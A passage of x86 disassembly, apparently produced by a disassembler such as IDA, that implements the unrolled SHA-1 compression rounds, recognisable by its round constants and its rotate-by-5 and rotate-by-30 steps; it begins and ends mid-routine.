shl ebx, 1Eh
or ebx, edi
mov ecx, eax
xor ecx, [ebp+var_30]
mov [ebp+var_4], ebx
xor ecx, [ebp+var_48]
xor ecx, [ebp+var_50]
mov edi, ecx
add ecx, ecx
shr edi, 1Fh
or edi, ecx
mov ecx, [ebp+var_10]
shr ecx, 1Bh
mov [ebp+var_50], edi
mov edi, [ebp+var_10]
shl edi, 5
or ecx, edi
add ecx, [ebp+var_50]
mov edi, [ebp+var_8]
xor edi, ebx
and edi, [ebp+arg_0]
xor edi, [ebp+var_8]
add edi, ecx
mov ecx, [ebp+var_C]
lea ecx, [ecx+edi+5A827999h]
mov [ebp+var_C], ecx
mov ecx, [ebp+arg_0]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, esi
xor ecx, [ebp+var_2C]
mov [ebp+arg_0], edi
xor ecx, [ebp+var_44]
xor edi, [ebp+var_4]
xor ecx, [ebp+var_4C]
and edi, [ebp+var_10]
mov ebx, ecx
xor edi, [ebp+var_4]
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+var_C]
shr ecx, 1Bh
mov [ebp+var_4C], ebx
mov ebx, [ebp+var_C]
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_4C]
add edi, ecx
mov ecx, [ebp+var_8]
lea ecx, [ecx+edi+5A827999h]
mov [ebp+var_8], ecx
mov ecx, [ebp+var_10]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, [ebp+var_28]
xor ecx, [ebp+var_40]
mov [ebp+var_10], edi
xor ecx, [ebp+var_48]
xor ecx, [ebp+var_54]
mov ebx, ecx
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+var_8]
mov [ebp+var_48], ebx
shr ecx, 1Bh
mov ebx, [ebp+var_8]
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_48]
mov ebx, [ebp+arg_0]
xor ebx, edi
and ebx, [ebp+var_C]
xor ebx, [ebp+arg_0]
add ebx, ecx
mov ecx, [ebp+var_4]
lea ecx, [ecx+ebx+5A827999h]
mov [ebp+var_4], ecx
mov ecx, [ebp+var_C]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, [ebp+var_24]
xor ecx, [ebp+var_3C]
mov [ebp+var_C], edi
xor ecx, [ebp+var_44]
xor ecx, [ebp+var_50]
mov ebx, ecx
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+var_4]
shr ecx, 1Bh
mov [ebp+var_44], ebx
mov ebx, [ebp+var_4]
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_44]
mov ebx, [ebp+var_10]
xor ebx, edi
xor ebx, [ebp+var_8]
add ebx, ecx
mov ecx, [ebp+arg_0]
lea ecx, [ecx+ebx+6ED9EBA1h]
mov [ebp+arg_0], ecx
mov ecx, [ebp+var_8]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, [ebp+var_20]
xor ecx, [ebp+var_38]
mov [ebp+var_8], edi
xor ecx, [ebp+var_40]
xor ecx, [ebp+var_4C]
mov ebx, ecx
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+arg_0]
mov [ebp+var_40], ebx
mov ebx, [ebp+arg_0]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_40]
mov ebx, [ebp+var_C]
xor ebx, edi
xor ebx, [ebp+var_4]
add ebx, ecx
mov ecx, [ebp+var_10]
lea ebx, [ecx+ebx+6ED9EBA1h]
mov ecx, [ebp+var_4]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, eax
xor ecx, [ebp+var_34]
mov [ebp+var_4], edi
xor ecx, [ebp+var_3C]
mov [ebp+var_10], ebx
xor ecx, [ebp+var_48]
mov edi, ecx
shr edi, 1Fh
add ecx, ecx
or edi, ecx
mov [ebp+var_3C], edi
mov edi, [ebp+arg_0]
xor edi, [ebp+var_8]
mov ecx, ebx
xor edi, [ebp+var_4]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_3C]
add edi, ecx
mov ecx, [ebp+var_C]
lea ecx, [ecx+edi+6ED9EBA1h]
mov [ebp+var_C], ecx
mov ecx, [ebp+arg_0]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, esi
xor ecx, [ebp+var_30]
mov [ebp+arg_0], edi
xor ecx, [ebp+var_38]
xor edi, [ebp+var_10]
xor ecx, [ebp+var_44]
xor edi, [ebp+var_4]
mov ebx, ecx
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+var_C]
shr ecx, 1Bh
mov [ebp+var_38], ebx
mov ebx, [ebp+var_C]
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_38]
add edi, ecx
mov ecx, [ebp+var_8]
lea ecx, [ecx+edi+6ED9EBA1h]
mov [ebp+var_8], ecx
mov ecx, [ebp+var_10]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, [ebp+var_2C]
xor ecx, [ebp+var_34]
mov [ebp+var_10], edi
xor ecx, [ebp+var_40]
xor ecx, [ebp+var_54]
mov ebx, ecx
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+var_8]
mov [ebp+var_34], ebx
mov ebx, [ebp+var_8]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_34]
mov ebx, [ebp+arg_0]
xor ebx, edi
xor ebx, [ebp+var_C]
add ebx, ecx
mov ecx, [ebp+var_4]
lea ecx, [ecx+ebx+6ED9EBA1h]
mov [ebp+var_4], ecx
mov ecx, [ebp+var_C]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, [ebp+var_28]
xor ecx, [ebp+var_30]
mov [ebp+var_C], edi
xor ecx, [ebp+var_3C]
xor ecx, [ebp+var_50]
mov ebx, ecx
shr ebx, 1Fh
add ecx, ecx
or ebx, ecx
mov ecx, [ebp+var_4]
shr ecx, 1Bh
mov [ebp+var_30], ebx
mov ebx, [ebp+var_4]
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_30]
mov ebx, [ebp+var_10]
xor ebx, edi
xor ebx, [ebp+var_8]
add ebx, ecx
mov ecx, [ebp+arg_0]
lea ecx, [ecx+ebx+6ED9EBA1h]
mov [ebp+arg_0], ecx
mov ecx, [ebp+var_8]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, [ebp+var_24]
xor ecx, [ebp+var_2C]
mov [ebp+var_8], edi
xor ecx, [ebp+var_38]
xor ecx, [ebp+var_4C]
mov ebx, ecx
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+arg_0]
shr ecx, 1Bh
mov [ebp+var_2C], ebx
mov ebx, [ebp+arg_0]
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_2C]
mov ebx, [ebp+var_C]
xor ebx, edi
xor ebx, [ebp+var_4]
add ebx, ecx
mov ecx, [ebp+var_10]
lea ebx, [ecx+ebx+6ED9EBA1h]
mov ecx, [ebp+var_4]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, [ebp+var_20]
xor ecx, [ebp+var_28]
mov [ebp+var_4], edi
xor ecx, [ebp+var_34]
mov [ebp+var_10], ebx
xor ecx, [ebp+var_48]
mov edi, ecx
add ecx, ecx
shr edi, 1Fh
or edi, ecx
mov [ebp+var_28], edi
mov edi, [ebp+arg_0]
xor edi, [ebp+var_8]
mov ecx, ebx
xor edi, [ebp+var_4]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_28]
add edi, ecx
mov ecx, [ebp+var_C]
lea ecx, [ecx+edi+6ED9EBA1h]
mov [ebp+var_C], ecx
mov ecx, [ebp+arg_0]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, eax
xor ecx, [ebp+var_24]
mov [ebp+arg_0], edi
xor ecx, [ebp+var_30]
xor ecx, [ebp+var_44]
xor edi, [ebp+var_10]
mov ebx, ecx
xor edi, [ebp+var_4]
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+var_C]
shr ecx, 1Bh
mov [ebp+var_24], ebx
mov ebx, [ebp+var_C]
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_24]
xor eax, [ebp+var_28]
add edi, ecx
mov ecx, [ebp+var_8]
lea ecx, [ecx+edi+6ED9EBA1h]
mov [ebp+var_8], ecx
mov ecx, [ebp+var_10]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, esi
xor ecx, [ebp+var_20]
xor eax, [ebp+var_3C]
xor ecx, [ebp+var_2C]
mov [ebp+var_10], edi
xor ecx, [ebp+var_40]
xor esi, [ebp+var_24]
mov ebx, ecx
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+var_8]
mov [ebp+var_20], ebx
mov ebx, [ebp+var_8]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_20]
mov ebx, [ebp+arg_0]
xor ebx, edi
xor ebx, [ebp+var_C]
add ebx, ecx
mov ecx, [ebp+var_4]
lea ebx, [ecx+ebx+6ED9EBA1h]
mov ecx, [ebp+var_C]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, eax
xor ecx, [ebp+var_54]
mov [ebp+var_4], ebx
mov eax, ecx
add ecx, ecx
shr eax, 1Fh
or eax, ecx
mov ecx, ebx
shl ebx, 5
shr ecx, 1Bh
or ecx, ebx
mov ebx, [ebp+var_10]
xor ebx, edi
mov [ebp+var_C], edi
mov edi, ecx
mov ecx, [ebp+var_8]
add edi, eax
xor ebx, ecx
add ebx, edi
mov edi, [ebp+arg_0]
lea ebx, [edi+ebx+6ED9EBA1h]
mov edi, ecx
shl edi, 1Eh
shr ecx, 2
or edi, ecx
xor esi, [ebp+var_38]
mov [ebp+arg_0], ebx
mov [ebp+var_8], edi
xor esi, [ebp+var_50]
mov ecx, esi
add esi, esi
shr ecx, 1Fh
or ecx, esi
mov esi, ebx
shr esi, 1Bh
shl ebx, 5
or esi, ebx
mov ebx, [ebp+var_C]
xor ebx, edi
mov edi, esi
mov esi, [ebp+var_4]
xor ebx, esi
add edi, ecx
add ebx, edi
mov edi, [ebp+var_10]
lea ebx, [edi+ebx+6ED9EBA1h]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_20]
xor esi, [ebp+var_34]
mov [ebp+var_4], edi
xor esi, [ebp+var_4C]
mov [ebp+var_10], ebx
xor esi, [ebp+var_54]
mov edi, esi
add esi, esi
shr edi, 1Fh
or edi, esi
mov [ebp+var_54], edi
mov edi, [ebp+arg_0]
xor edi, [ebp+var_8]
mov esi, ebx
xor edi, [ebp+var_4]
shr esi, 1Bh
shl ebx, 5
or esi, ebx
add esi, [ebp+var_54]
add edi, esi
mov esi, [ebp+var_C]
lea esi, [esi+edi+6ED9EBA1h]
mov [ebp+var_C], esi
mov esi, [ebp+arg_0]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, eax
xor esi, [ebp+var_30]
mov [ebp+arg_0], edi
xor esi, [ebp+var_48]
xor edi, [ebp+var_10]
xor esi, [ebp+var_50]
xor edi, [ebp+var_4]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, [ebp+var_C]
shr esi, 1Bh
mov [ebp+var_50], ebx
mov ebx, [ebp+var_C]
shl ebx, 5
or esi, ebx
add esi, [ebp+var_50]
add edi, esi
mov esi, [ebp+var_8]
lea esi, [esi+edi+6ED9EBA1h]
mov [ebp+var_8], esi
mov esi, [ebp+var_10]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, ecx
xor esi, [ebp+var_2C]
mov [ebp+var_10], edi
xor esi, [ebp+var_44]
xor esi, [ebp+var_4C]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, [ebp+var_8]
shr esi, 1Bh
mov [ebp+var_4C], ebx
mov ebx, [ebp+var_8]
shl ebx, 5
or esi, ebx
add esi, [ebp+var_4C]
mov ebx, [ebp+arg_0]
xor ebx, edi
xor ebx, [ebp+var_C]
add ebx, esi
mov esi, [ebp+var_4]
lea esi, [esi+ebx+6ED9EBA1h]
mov [ebp+var_4], esi
mov esi, [ebp+var_C]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_28]
xor esi, [ebp+var_40]
mov [ebp+var_C], edi
xor esi, [ebp+var_48]
xor esi, [ebp+var_54]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, [ebp+var_4]
mov [ebp+var_48], ebx
mov ebx, [ebp+var_4]
shr esi, 1Bh
shl ebx, 5
or esi, ebx
add esi, [ebp+var_48]
mov ebx, [ebp+var_10]
xor ebx, edi
xor ebx, [ebp+var_8]
add ebx, esi
mov esi, [ebp+arg_0]
lea esi, [esi+ebx+6ED9EBA1h]
mov [ebp+arg_0], esi
mov esi, [ebp+var_8]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_24]
xor esi, [ebp+var_3C]
mov [ebp+var_8], edi
xor esi, [ebp+var_44]
xor esi, [ebp+var_50]
mov ebx, esi
shr ebx, 1Fh
add esi, esi
or ebx, esi
mov esi, [ebp+arg_0]
mov [ebp+var_44], ebx
mov ebx, [ebp+arg_0]
shl ebx, 5
shr esi, 1Bh
or esi, ebx
mov ebx, [ebp+var_C]
add esi, [ebp+var_44]
xor ebx, edi
xor ebx, [ebp+var_4]
add ebx, esi
mov esi, [ebp+var_10]
lea ebx, [esi+ebx+6ED9EBA1h]
mov esi, [ebp+var_4]
mov edi, esi
shl edi, 1Eh
shr esi, 2
mov [ebp+var_10], ebx
or edi, esi
mov esi, [ebp+var_20]
xor esi, [ebp+var_38]
mov [ebp+var_4], edi
xor esi, [ebp+var_40]
xor esi, [ebp+var_4C]
mov edi, esi
add esi, esi
shr edi, 1Fh
or edi, esi
mov [ebp+var_40], edi
mov edi, [ebp+arg_0]
xor edi, [ebp+var_8]
mov esi, ebx
xor edi, [ebp+var_4]
shr esi, 1Bh
shl ebx, 5
or esi, ebx
add esi, [ebp+var_40]
add edi, esi
mov esi, [ebp+var_C]
lea esi, [esi+edi+6ED9EBA1h]
mov [ebp+var_C], esi
mov esi, [ebp+arg_0]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, eax
xor esi, [ebp+var_34]
mov [ebp+arg_0], edi
xor esi, [ebp+var_3C]
xor edi, [ebp+var_10]
xor esi, [ebp+var_48]
xor edi, [ebp+var_4]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, [ebp+var_C]
shr esi, 1Bh
mov [ebp+var_3C], ebx
mov ebx, [ebp+var_C]
shl ebx, 5
or esi, ebx
add esi, [ebp+var_3C]
add edi, esi
mov esi, [ebp+var_8]
lea esi, [esi+edi+6ED9EBA1h]
mov [ebp+var_8], esi
mov esi, [ebp+var_10]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, ecx
xor esi, [ebp+var_30]
mov [ebp+var_10], edi
xor esi, [ebp+var_38]
xor esi, [ebp+var_44]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, [ebp+var_8]
mov [ebp+var_38], ebx
mov ebx, [ebp+var_8]
shr esi, 1Bh
shl ebx, 5
or esi, ebx
mov ebx, [ebp+arg_0]
add esi, [ebp+var_38]
xor ebx, edi
xor ebx, [ebp+var_C]
add ebx, esi
mov esi, [ebp+var_4]
lea esi, [esi+ebx+6ED9EBA1h]
mov [ebp+var_4], esi
mov esi, [ebp+var_C]
mov edi, esi
shl edi, 1Eh
shr esi, 2
or edi, esi
mov esi, [ebp+var_2C]
xor esi, [ebp+var_34]
mov [ebp+var_C], edi
xor esi, [ebp+var_40]
xor esi, [ebp+var_54]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, edi
or esi, [ebp+var_8]
and edi, [ebp+var_8]
and esi, [ebp+var_10]
mov [ebp+var_34], ebx
or esi, edi
add esi, [ebp+var_34]
mov edi, [ebp+var_4]
mov ebx, [ebp+var_4]
shr edi, 1Bh
shl ebx, 5
or edi, ebx
add edi, esi
mov esi, [ebp+arg_0]
lea esi, [esi+edi-70E44324h]
mov [ebp+arg_0], esi
mov esi, [ebp+var_8]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_28]
xor esi, [ebp+var_30]
mov [ebp+var_8], edi
xor esi, [ebp+var_3C]
xor esi, [ebp+var_50]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, edi
or esi, [ebp+var_4]
and edi, [ebp+var_4]
and esi, [ebp+var_C]
mov [ebp+var_30], ebx
mov ebx, [ebp+arg_0]
or esi, edi
add esi, [ebp+var_30]
mov edi, [ebp+arg_0]
shr edi, 1Bh
shl ebx, 5
or edi, ebx
add edi, esi
mov esi, [ebp+var_10]
lea esi, [esi+edi-70E44324h]
mov [ebp+var_10], esi
mov esi, [ebp+var_4]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_24]
xor esi, [ebp+var_2C]
mov [ebp+var_4], edi
xor esi, [ebp+var_38]
xor esi, [ebp+var_4C]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, [ebp+arg_0]
or esi, edi
and esi, [ebp+var_8]
mov [ebp+var_2C], ebx
mov ebx, [ebp+arg_0]
and ebx, edi
mov edi, [ebp+var_10]
or esi, ebx
mov ebx, [ebp+var_10]
shr edi, 1Bh
shl ebx, 5
add esi, [ebp+var_2C]
or edi, ebx
add edi, esi
mov esi, [ebp+var_C]
lea esi, [esi+edi-70E44324h]
mov [ebp+var_C], esi
mov esi, [ebp+arg_0]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, [ebp+var_20]
xor esi, [ebp+var_28]
mov [ebp+arg_0], edi
xor esi, [ebp+var_34]
xor esi, [ebp+var_48]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, edi
or esi, [ebp+var_10]
and edi, [ebp+var_10]
and esi, [ebp+var_4]
mov [ebp+var_28], ebx
or esi, edi
add esi, [ebp+var_28]
mov edi, [ebp+var_C]
mov ebx, [ebp+var_C]
shr edi, 1Bh
shl ebx, 5
or edi, ebx
add edi, esi
mov esi, [ebp+var_8]
lea esi, [esi+edi-70E44324h]
mov [ebp+var_8], esi
mov esi, [ebp+var_10]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, eax
xor esi, [ebp+var_24]
mov [ebp+var_10], edi
xor esi, [ebp+var_30]
xor esi, [ebp+var_44]
mov ebx, esi
add esi, esi
shr ebx, 1Fh
or ebx, esi
mov esi, edi
or esi, [ebp+var_C]
and edi, [ebp+var_C]
and esi, [ebp+arg_0]
mov [ebp+var_24], ebx
mov ebx, [ebp+var_8]
or esi, edi
add esi, [ebp+var_24]
mov edi, [ebp+var_8]
shr edi, 1Bh
shl ebx, 5
or edi, ebx
add edi, esi
mov esi, [ebp+var_4]
lea esi, [esi+edi-70E44324h]
mov [ebp+var_4], esi
mov esi, [ebp+var_C]
mov edi, esi
shr esi, 2
shl edi, 1Eh
or edi, esi
mov esi, ecx
xor esi, [ebp+var_20]
mov [ebp+var_C], edi
xor esi, [ebp+var_2C]
xor esi, [ebp+var_40]
mov ebx, esi
shr ebx, 1Fh
add esi, esi
or ebx, esi
mov [ebp+var_20], ebx
xor eax, [ebp+var_28]
mov esi, edi
and edi, [ebp+var_8]
or esi, [ebp+var_8]
mov ebx, [ebp+var_4]
and esi, [ebp+var_10]
xor eax, [ebp+var_3C]
or esi, edi
add esi, [ebp+var_20]
mov edi, [ebp+var_4]
xor eax, [ebp+var_54]
shr edi, 1Bh
shl ebx, 5
or edi, ebx
add edi, esi
mov esi, [ebp+arg_0]
lea esi, [esi+edi-70E44324h]
xor ecx, [ebp+var_24]
mov [ebp+arg_0], esi
mov esi, [ebp+var_8]
mov ebx, [ebp+arg_0]
xor ecx, [ebp+var_38]
mov edi, esi
shl edi, 1Eh
xor ecx, [ebp+var_50]
shr esi, 2
or edi, esi
mov esi, eax
add eax, eax
mov [ebp+var_8], edi
shr esi, 1Fh
or esi, eax
mov eax, edi
and edi, [ebp+var_4]
or eax, [ebp+var_4]
shl ebx, 5
and eax, [ebp+var_C]
or eax, edi
mov edi, [ebp+arg_0]
shr edi, 1Bh
or edi, ebx
mov ebx, [ebp+arg_0]
add eax, esi
add edi, eax
mov eax, [ebp+var_10]
lea eax, [eax+edi-70E44324h]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
mov edi, eax
shl edi, 1Eh
shr eax, 2
or edi, eax
mov eax, ecx
add ecx, ecx
and ebx, edi
shr eax, 1Fh
or eax, ecx
mov ecx, [ebp+arg_0]
or ecx, edi
and ecx, [ebp+var_8]
mov [ebp+var_4], edi
mov edi, [ebp+var_10]
or ecx, ebx
mov ebx, [ebp+var_10]
shr edi, 1Bh
add ecx, eax
shl ebx, 5
or edi, ebx
add edi, ecx
mov ecx, [ebp+var_C]
lea ecx, [ecx+edi-70E44324h]
mov edi, [ebp+arg_0]
mov [ebp+var_C], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, [ebp+var_20]
xor edi, [ebp+var_34]
mov [ebp+arg_0], ecx
xor edi, [ebp+var_4C]
xor edi, [ebp+var_54]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_10]
and ecx, [ebp+var_10]
and edi, [ebp+var_4]
mov [ebp+var_54], ebx
or edi, ecx
add edi, [ebp+var_54]
mov ecx, [ebp+var_C]
mov ebx, [ebp+var_C]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_8]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+var_10]
mov [ebp+var_8], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, esi
xor edi, [ebp+var_30]
mov [ebp+var_10], ecx
xor edi, [ebp+var_48]
xor edi, [ebp+var_50]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_C]
and ecx, [ebp+var_C]
and edi, [ebp+arg_0]
mov [ebp+var_50], ebx
mov ebx, [ebp+var_8]
or edi, ecx
add edi, [ebp+var_50]
mov ecx, [ebp+var_8]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_4]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+var_C]
mov [ebp+var_4], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, eax
xor edi, [ebp+var_2C]
mov [ebp+var_C], ecx
xor edi, [ebp+var_44]
xor edi, [ebp+var_4C]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_8]
and ecx, [ebp+var_8]
and edi, [ebp+var_10]
mov [ebp+var_4C], ebx
mov ebx, [ebp+var_4]
or edi, ecx
mov ecx, [ebp+var_4]
add edi, [ebp+var_4C]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+arg_0]
lea ecx, [edi+ecx-70E44324h]
mov [ebp+arg_0], ecx
mov edi, [ebp+var_8]
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, [ebp+var_28]
xor edi, [ebp+var_40]
mov [ebp+var_8], ecx
xor edi, [ebp+var_48]
xor edi, [ebp+var_54]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_4]
and ecx, [ebp+var_4]
and edi, [ebp+var_C]
mov [ebp+var_48], ebx
or edi, ecx
add edi, [ebp+var_48]
mov ecx, [ebp+arg_0]
mov ebx, [ebp+arg_0]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_10]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+var_4]
mov [ebp+var_10], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, [ebp+var_24]
xor edi, [ebp+var_3C]
mov [ebp+var_4], ecx
xor edi, [ebp+var_44]
xor edi, [ebp+var_50]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, [ebp+arg_0]
or edi, ecx
and edi, [ebp+var_8]
mov [ebp+var_44], ebx
mov ebx, [ebp+arg_0]
and ebx, ecx
mov ecx, [ebp+var_10]
or edi, ebx
add edi, [ebp+var_44]
mov ebx, [ebp+var_10]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_C]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+arg_0]
mov [ebp+var_C], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, [ebp+var_20]
xor edi, [ebp+var_38]
mov [ebp+arg_0], ecx
xor edi, [ebp+var_40]
xor edi, [ebp+var_4C]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_10]
and ecx, [ebp+var_10]
and edi, [ebp+var_4]
mov [ebp+var_40], ebx
or edi, ecx
add edi, [ebp+var_40]
mov ecx, [ebp+var_C]
mov ebx, [ebp+var_C]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_8]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+var_10]
mov [ebp+var_8], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, esi
xor edi, [ebp+var_34]
mov [ebp+var_10], ecx
xor edi, [ebp+var_3C]
xor edi, [ebp+var_48]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_C]
and ecx, [ebp+var_C]
and edi, [ebp+arg_0]
mov [ebp+var_3C], ebx
or edi, ecx
add edi, [ebp+var_3C]
mov ecx, [ebp+var_8]
mov ebx, [ebp+var_8]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_4]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+var_C]
mov [ebp+var_4], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, eax
xor edi, [ebp+var_30]
mov [ebp+var_C], ecx
xor edi, [ebp+var_38]
xor edi, [ebp+var_44]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_8]
and ecx, [ebp+var_8]
and edi, [ebp+var_10]
mov [ebp+var_38], ebx
mov ebx, [ebp+var_4]
or edi, ecx
add edi, [ebp+var_38]
mov ecx, [ebp+var_4]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+arg_0]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+var_8]
mov [ebp+arg_0], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, [ebp+var_2C]
xor edi, [ebp+var_34]
mov [ebp+var_8], ecx
xor edi, [ebp+var_40]
xor edi, [ebp+var_54]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_4]
and ecx, [ebp+var_4]
and edi, [ebp+var_C]
mov [ebp+var_34], ebx
or edi, ecx
add edi, [ebp+var_34]
mov ecx, [ebp+arg_0]
mov ebx, [ebp+arg_0]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_10]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+var_4]
mov [ebp+var_10], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, [ebp+var_28]
xor edi, [ebp+var_30]
mov [ebp+var_4], ecx
xor edi, [ebp+var_3C]
xor edi, [ebp+var_50]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, [ebp+arg_0]
or edi, ecx
and edi, [ebp+var_8]
mov [ebp+var_30], ebx
mov ebx, [ebp+arg_0]
and ebx, ecx
mov ecx, [ebp+var_10]
or edi, ebx
add edi, [ebp+var_30]
mov ebx, [ebp+var_10]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_C]
lea ecx, [edi+ecx-70E44324h]
mov edi, [ebp+arg_0]
mov [ebp+var_C], ecx
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, [ebp+var_24]
xor edi, [ebp+var_2C]
mov [ebp+arg_0], ecx
xor edi, [ebp+var_38]
xor edi, [ebp+var_4C]
mov ebx, edi
add edi, edi
shr ebx, 1Fh
or ebx, edi
mov edi, ecx
or edi, [ebp+var_10]
and ecx, [ebp+var_10]
and edi, [ebp+var_4]
mov [ebp+var_2C], ebx
mov ebx, [ebp+var_C]
or edi, ecx
mov ecx, [ebp+var_C]
add edi, [ebp+var_2C]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_8]
lea ecx, [edi+ecx-70E44324h]
